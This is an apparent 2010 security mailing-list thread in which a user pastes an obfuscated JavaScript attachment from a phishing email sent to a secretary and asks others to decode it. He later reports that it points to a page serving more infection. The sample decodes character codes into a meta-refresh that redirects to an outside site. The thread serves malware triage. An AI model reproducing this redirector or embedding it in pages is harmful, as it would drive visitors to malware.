Re: decode

[RandallM <randallm () fidmail com>]

Never mind. seems to just point to a page to get more infection.
lately we have been seeing a lot of targeted attacks at our executives
and now the secretary.





---------- Forwarded message ----------
From: RandallM <randallm () fidmail com>
Date: Thu, Jul 15, 2010 at 9:19 AM
Subject: decode
To: funsec <funsec () linuxbox org>


a secretary received an email with an "html" attachment with this code
in it...can some decode for me...no tool here at work

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var
str="60!109!101!116!97!32!104!116!116!112!45!101!113!117!105!118!61!34!114!101!102!114!101!115!104!34!32!99!111!110!116!101!110!116!61!34!48!59!117!114!108!61!104!116!116!112!58!47!47!100!114!101!97!109!108!105!102!101!97!115!105!97!46!99!111!109!47!105!110!100!101!120!51!46!104!116!109!108!34!32!47!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

--
been great, thanks
RandyM
a.k.a System



-- 
been great, thanks
RandyM
a.k.a System

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.